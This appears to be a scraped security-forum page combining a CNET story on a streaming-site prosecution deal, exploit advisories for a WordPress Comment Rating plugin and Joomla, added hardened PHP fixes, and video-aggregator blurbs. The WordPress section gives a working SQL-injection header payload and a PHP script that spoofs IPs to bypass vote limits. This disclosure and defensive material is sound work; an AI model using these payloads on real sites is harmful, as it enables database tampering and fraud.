Feds strike a deal with alleged illegal streaming site operator Homeland Security banner that goes on seized domain name sites. (Credit: Screenshot by David Carnoy/CNET) After taking down Channelsurfing.net and arresting its alleged owner in 2011, the feds now seem to be easing up. Before going to trial, the government struck a deal earlier this month with the alleged site owner Brian McCarthy. In a "Deferred Prosecution" memo filed on February 11, which was obtained by TorrentFreak, U.S. Attorney Preet Bharara writes that "after a thorough investigation, it has been determined that the interest of the United States and your own interest will best be served by deferring prosecution in this District. Prosecution will be deferred during the term of your good behavior and satisfactory compliance with the terms of this agreement." Channelsurfing.net was seized in February 2011 during a massive Department of Homeland Security crackdown on sports streaming sites that were allegedly infringing on copyright laws. At the time, Bharara said in a statement, "The illegal streaming of professional sporting events over the Internet deals a financial body blow to the leagues and broadcasters who are forced to pass their losses off to the fans in the form of higher priced tickets and pay-per-view events... the seizures of these infringing Web sites reaffirm our commitment to working with our law enforcement partners to protect copyrighted material and put the people who steal it out of business." Shortly after the site's seizure, McCarthy was arrested and accused of criminal copyright infringement, according to TorrentFreak. Channelsurfing.net did not actually stream sports itself but instead linked to external sport streams. It's unclear why the feds are letting McCarthy off the hook. Under the terms of the deal he came to with the government, he has to show good behavior, find a legal job, not violate any laws, and steer clear of anything to do with illegal Internet streaming. 
He also has to pay back $351,033, which he allegedly made via Channelsurfing.net, according to TorrentFreak. Under its program "Operation In Our Sites," the Department of Homeland Security has continued to crack down on illegal sports streaming sites over the past couple of years. Last February, it seized 307 Web sites that either live-streamed sports or sold fake NFL paraphernalia. It also arrested a man who allegedly operated nine of the streaming sites on criminal copyright infringement charges. According to U.S. Immigration and Customs Enforcement, more than 700 domain names have been seized since "Operation In Our Sites" launched in 2010. Source: Feds strike a deal with alleged illegal streaming site operator | Security & Privacy - CNET News
-
Wordpress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities

# Exploit Title: Wordpress plugin: Comment Rating SQL injection
# Google Dork:
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4

Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php

First, the IP is taken from the HTTP_X_FORWARDED_FOR header.
-----------------------------------------------------------------------
$ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
if(strstr($row['ck_ips'], $ip)) {
    // die('error|You have already voted on this item!');
    // Just don't count duplicated votes
    $duplicated = 1;
    $ck_ips = $row['ck_ips'];
}

Later an UPDATE is made without filtering the input.
------------------------------------------------------------------------
$query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips . "' WHERE ck_comment_id = $k_id";

So let's take a look in the DB:

mysql> select * from wp_comment_rating;
+---------------+----------------+--------------+----------------+
| ck_comment_id | ck_ips         | ck_rating_up | ck_rating_down |
+---------------+----------------+--------------+----------------+
|             2 | ,20.209.10.130 |            1 |              0 |
|             3 |                |            0 |              0 |
+---------------+----------------+--------------+----------------+
2 rows in set (0.00 sec)

Now make an HTTP request with an injection in the HTTP_X_FORWARDED_FOR header:

GET /wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_ HTTP/1.1
Host: 192.168.1.10
Accept-Encoding: gzip, deflate
X-Forwarded-For: ', ck_ips=(select user()) WHERE ck_comment_id=2#
Connection: keep-alive

And the result is:

mysql> select * from wp_comment_rating;
+---------------+---------------------+--------------+----------------+
| ck_comment_id | ck_ips              | ck_rating_up | ck_rating_down |
+---------------+---------------------+--------------+----------------+
|             2 | wordpress@localhost |            2 |              0 |
|             3 |                     |            0 |              0 |
+---------------+---------------------+--------------+----------------+
2 rows in set (0.00 sec)

Cheers

=======================================================================================

# Exploit Title: Wordpress plugin: Comment Rating Bypass vote limitation
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4

Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php

First, the IP is taken from the HTTP_X_FORWARDED_FOR header.
-----------------------------------------------------------------------
$ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
if(strstr($row['ck_ips'], $ip)) {
    // die('error|You have already voted on this item!');
    // Just don't count duplicated votes
    $duplicated = 1;
    $ck_ips = $row['ck_ips'];
}

Later an UPDATE is made without filtering the input.
------------------------------------------------------------------------
$query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips . "' WHERE ck_comment_id = $k_id";

Now, to bypass the vote limitation, we just have to add the HTTP_X_FORWARDED_FOR header and change it once per request. A simple POC is made in php.

<?PHP
define('HOST', 'http://localhost/wordpress/');
define('IDCOMMENT', 2);
$url = parse_url(HOST);
define('URL', $url['path'] . 'wp-content/plugins/comment-rating/ck-processkarma.php?id=' . IDCOMMENT . '&action=add&path=a&imgIndex=1_14_');

for ($i = 0; $i < 1; $i++) lvlup();

function lvlup() {
    global $url;
    $header  = "GET " . URL . " HTTP/1.1 \r\n";
    $header .= "Host: " . $url['host'] . "\r\n";
    $header .= "Accept-Encoding: gzip, deflate \r\n";
    $header .= "X-Forwarded-For: " . long2ip(rand(0, "4294967295")) . "\r\n";
    $header .= "Connection: close \r\n\r\n";
    $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    socket_connect($socket, $url['host'], 80);
    socket_write($socket, $header);
    socket_close($socket);
}
?>

Source: Wordpress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities
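Both findings above share one root cause: the plugin takes an attacker-controlled header as the client IP and splices it into SQL by string concatenation. The following is an added example written for this post, not the plugin's own code, showing what a hardened version of that path looks like; it assumes WordPress' `$wpdb` object, that `$table_name` is built from the table prefix rather than from request data, and that `$stored_ips` is the `ck_ips` column value shown in the advisory.

```php
<?php
// Added example, not the plugin's code: hardened replacements for the IP
// lookup and the UPDATE in ck-processkarma.php. Assumes WordPress' $wpdb,
// a $table_name built from the prefix (never from request data) and
// $stored_ips holding the ck_ips column shown in the advisory.

// Only honour X-Forwarded-For when the request actually arrived through a
// proxy we operate. Otherwise any client can set the header to any value,
// which is what enables both the injection and the vote-limit bypass.
function ck_client_ip(array $server, array $trusted_proxies) {
    $remote = isset($server['REMOTE_ADDR']) ? $server['REMOTE_ADDR'] : '';
    $candidate = $remote;
    if (in_array($remote, $trusted_proxies, true) && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        $parts = explode(',', $server['HTTP_X_FORWARDED_FOR']);
        $candidate = trim($parts[0]);   // client-most entry of the header
    }
    // Whitelist validation: anything that is not a literal IP address is
    // rejected, so a payload such as "', ck_ips=(select user()) WHERE ..."
    // never reaches the query.
    return filter_var($candidate, FILTER_VALIDATE_IP) !== false ? $candidate : null;
}

// Exact match on the comma-separated list instead of strstr(): strstr()
// reports "1.2.3.4" as already present when only "11.2.3.45" was recorded.
function ck_already_voted($stored_ips, $ip) {
    $list = array_map('trim', explode(',', (string) $stored_ips));
    return in_array($ip, $list, true);
}

function ck_record_vote($wpdb, $table_name, $comment_id, $direction, $rating, $stored_ips, $ip) {
    // $direction becomes part of a column name and cannot be a bound value,
    // so restrict it to the two columns that exist.
    if ($ip === null || !in_array($direction, array('up', 'down'), true)) {
        return false;
    }
    $column  = 'ck_rating_' . $direction;
    $new_ips = ck_already_voted($stored_ips, $ip) ? $stored_ips : $stored_ips . ',' . $ip;
    // Every value goes through a placeholder; the IP list is never
    // concatenated into the SQL string.
    $sql = $wpdb->prepare(
        "UPDATE `$table_name` SET `$column` = %d, ck_ips = %s WHERE ck_comment_id = %d",
        (int) $rating, $new_ips, (int) $comment_id
    );
    return $wpdb->query($sql);
}
```

With an empty `$trusted_proxies` list the header is ignored entirely and `REMOTE_ADDR` is used, which is the right default for a site that is not behind a reverse proxy.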
-
Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability
-------------------------------------------------------------------

[-] Software Link:
http://www.joomla.org/

[-] Affected Versions:
Version 3.0.2 and earlier 3.0.x versions.
Version 2.5.8 and earlier 2.5.x versions.

[-] Vulnerability Description:
The vulnerable code is located in /plugins/system/highlight/highlight.php:

56. // Get the terms to highlight from the request.
57. $terms = $input->request->get('highlight', null, 'base64');
58. $terms = $terms ? unserialize(base64_decode($terms)) : null;

User input passed through the "highlight" parameter is not properly sanitized before being used in an unserialize() call at line 58. This can be exploited to inject arbitrary PHP objects into the application scope. Successful exploitation of this vulnerability doesn't require authentication, but requires the "System Highlight" plugin to be enabled (as it is in the default configuration).

[-] Solution:
Upgrade to version 3.0.3 or 2.5.9.

[-] Disclosure Timeline:
[31/10/2012] - Vendor notified
[08/11/2012] - Vendor asked for a proof of concept
[08/11/2012] - Proof of concept provided to the vendor
[04/02/2013] - Vendor update released
[27/02/2013] - Public disclosure

[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-1453 to this vulnerability.

[-] Credits:
Vulnerability discovered by Egidio Romano.

[-] Original Advisory:
http://karmainsecurity.com/KIS-2013-03

Source: Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability
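The advisory's line 58 is the classic unserialize-on-user-input pattern. As an added illustration that is not Joomla's code, the block below places that pattern next to a hardened reader for the same parameter; it assumes the `highlight` value is meant to be a flat list of search-term strings, which is what the plugin consumes, and uses the `allowed_classes` option that exists from PHP 7.0 on.

```php
<?php
// Added example, not Joomla's code: the highlight.php pattern beside a
// hardened replacement. $param is the raw base64 "highlight" request value.

// Pattern from the advisory: whatever object graph the client serialised is
// instantiated, so any class with __wakeup()/__destruct() becomes reachable.
function highlight_terms_vulnerable($param) {
    return $param ? unserialize(base64_decode($param)) : null;
}

// Hardened: decode strictly, refuse to instantiate any class, and accept
// only a bounded list of short strings, which is all the plugin needs.
function highlight_terms_safe($param, $max_terms = 20, $max_len = 64) {
    if (!is_string($param) || $param === '') {
        return null;
    }
    $raw = base64_decode($param, true);   // strict mode rejects stray bytes
    if ($raw === false) {
        return null;
    }
    // allowed_classes => false (PHP >= 7.0) turns every serialised object
    // into __PHP_Incomplete_Class, so no constructor, __wakeup() or
    // __destruct() of an application class runs during unserialize().
    $data = @unserialize($raw, array('allowed_classes' => false));
    if (!is_array($data) || count($data) > $max_terms) {
        return null;
    }
    $terms = array();
    foreach ($data as $term) {
        // Anything other than a non-empty, length-bounded string is rejected.
        if (!is_string($term) || $term === '' || strlen($term) > $max_len) {
            return null;
        }
        $terms[] = $term;
    }
    return $terms;
}

// Caller side, assumed to mirror the advisory's $input->request->get():
// $terms = highlight_terms_safe($input->request->get('highlight', null, 'base64'));
```

Where the serialised format is not needed for compatibility, replacing it with `json_decode()` of a JSON array removes the unserialize() call altogether.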
-
Description: This video demonstrates one approach to gaining root access to the 'boot to root' challenge known as VulnVPN.

VulnVPN (Vulnerable VPN) - Exploiting IKE Aggressive Mode PSK
VulnHub - HackLAB VulnVPN

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:

Source: One Possible Way To Root Vulnvpn
-
Cyber attack on 60 Romanian sites by a Syrian hacker
Kwelwild replied to Nytro's topic in Stiri securitate
Now that's a real threat; if only presidency.ro had been among the 60 sites too. -
Description: Executable Drive-by downloader module of Exploitation Framework

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

Original Source:

Source: Owasp Xenotix Xss Exploit Framework V3: Executable Drive-By Downloader